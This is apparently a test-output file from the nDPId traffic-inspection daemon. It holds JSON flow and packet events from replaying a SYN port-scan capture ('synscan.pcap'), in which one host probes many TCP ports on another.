-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsHdEAADUG9aGsEAAIQA2GNIzS3aLdUoMYAAAAAGACCABS7AAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsiq8AAC4Gj8OsEAAIQA2GNIzSI4vdUoMYAAAAAGACDAAJBAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAso2cAACwGeQusEAAIQA2GNIzSD83dUoMYAAAAAGACBAAkwgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsQAcAADQG1GusEAAIQA2GNIzSBEbdUoMYAAAAAGACBAAwSQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsJQwAACwG92asEAAIQA2GNIzSCBTdUoMYAAAAAGACBAAsewAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAs5EoAADgGLCisEAAIQA2GNIzSH5PdUoMYAAAAAGACBAAU\/AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsgf0AACsGm3WsEAAIQA2GNIzSAwndUoMYAAAAAGACEAAlhgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsqw0AADUGaGWsEAAIQA2GNIzSBDLdUoMYAAAAAGACCAAsXQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsFlIAADYG\/CCsEAAIQA2GNIzSNZrdUoMYAAAAAGACDAD29AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsq0oAADgGZSisEAAIQA2GNIzSD1DdUoMYAAAAAGACBAAlPwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsxHMAACoGWf+sEAAIQA2GNIzSFxDdUoMYAAAAAGACDAAVfwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060906,"flow_last_seen":1278275060906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_packet_id":1,"flow_last_seen":1278275060906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060906,"pkt":"ACYLMQczACWzv5HuCABFAAAs2HMAACoGRf+sEAAIQA2GNIzSAxPdUoMYAAAAAGACDAApfAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060948,"flow_last_seen":1278275060948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060948,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_packet_id":1,"flow_last_seen":1278275060948,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060948,"pkt":"ACYLMQczACWzv5HuCABFAAAsW74AAC8GvbSsEAAIQA2GNIzTUVzdU4MZAAAAAGACEADXLwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsRtIAACoG16CsEAAIQA2GNIzTZmbdU4MZAAAAAGACDADGJQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAswvIAAC8GVoCsEAAIQA2GNIzTAHfdU4MZAAAAAGACEAAoFQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAslyQAADQGfU6sEAAIQA2GNIzTA2ndU4MZAAAAAGACBAAxIwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAs4nsAACsGOvesEAAIQA2GNIzTA4TdU4MZAAAAAGACEAAlCAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAswGgAACwGXAqsEAAIQA2GNIzTBATdU4MZAAAAAGACBAAwiAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsjQAAADUGhnKsEAAIQA2GNIzTDnfdU4MZAAAAAGACCAAiFQAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsxBEAACgGXGGsEAAIQA2GNIzTAGTdU4MZAAAAAGACBAA0KAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAst8gAADsGVaqsEAAIQA2GNIzTA4fdU4MZAAAAAGACEAAlBQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsWzkAACgGxTmsEAAIQA2GNIzTA\/\/dU4MZAAAAAGACBAAwjQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAs6kQAADYGKC6sEAAIQA2GNIzTBTbdU4MZAAAAAGACDAAnVgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAszccAADoGQKusEAAIQA2GNIzTE77dU4MZAAAAAGACDAAYzgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 